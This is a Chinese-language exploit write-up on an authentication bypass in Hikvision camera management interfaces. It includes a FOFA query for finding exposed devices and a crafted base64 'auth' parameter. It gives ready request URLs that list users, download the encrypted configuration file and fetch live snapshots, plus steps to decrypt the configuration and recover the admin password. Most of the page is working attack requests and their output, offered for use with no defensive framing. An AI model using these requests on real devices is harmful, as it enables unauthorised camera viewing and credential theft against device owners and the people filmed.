Print document Edit on github

Hikvision ConfigurationFiles Unauth

fofa: app=”HIKVISION-视频监控”

HIKVISION监控设备管理后台存在未授权,通过构造url可绕过登录查看监控,检索所有用户和配置文件下载。

构造url主要是通过如下的auth参数构造生成base64加密字段,如下所示:

echo admin:11 |base64
YWRtaW46MTEK

  • 检索所有用户及其角色的列表
  • http://{ip.addr}:{ip.port}/Security/users?auth=YWRtaW46MTEK

    返回xml信息:

    <UserList version="1.0">
    <User version="1.0">
    <id>1</id>
    <userName>admin</userName>
    <priority>high</priority>
    <ipAddress>0.0.0.0</ipAddress>
    <macAddress>00:00:00:00:00:00</macAddress>
    <userLevel>Administrator</userLevel>
    </User>
    </UserList>
    

  • 下载账号密码配置文件
  • http://{ip.addr}:{ip.port}/System/configurationFile?auth=YWRtaW46MTEK

    ➜  file configurationFile
    configurationFile: PGP Secret Key -
    

    如上,我们配置文件下载完成后可以看到是PGP加密文件,所以我们需要对文件进行解密才可以找到账号密码的配置信息;文件解密出的账号密码就是监控设备后台管理的账号密码信息,我们得到信息直接登录即可。解密软件用法及链接如下:

    # Usage:

    Open [hikvision-decrypter.exe] on Windows platform:

  • Open Configuration File ->
  • Encrypted ->
  • Decrypt Data(Decrypting AES...) ->
  • (Successfully decrypted data) ->
  • Save Configuration File.
  • # Find pass in decrypted data

    用 010-Editor程序打开decrypted data 文件. 文件内搜索admin字符串,如左图;

    Boom! Easy to find password! (admin:asdf1234)

    * 我们通过[Usage]来获得的帐号密码登录即可,有机会会从代码角度分析一下为什么存在未授权访问

    # 相关链接一览表

    Desc Link
    Download Hikvision exec hikvision-decrypter.exe and here is: Repos
    Download configurationFile Sample configurationFile
    Download configurationFile decry-Sample configurationFile-decry

  • 获取监控快照
  • http://{ip.addr}:{ip.port}/onvif-http/snapshot?auth=YWRtaW46MTEK

    当前时间下监控的快照图片

    GPEeKkcqsAFRDYO.png

    参考

    以上。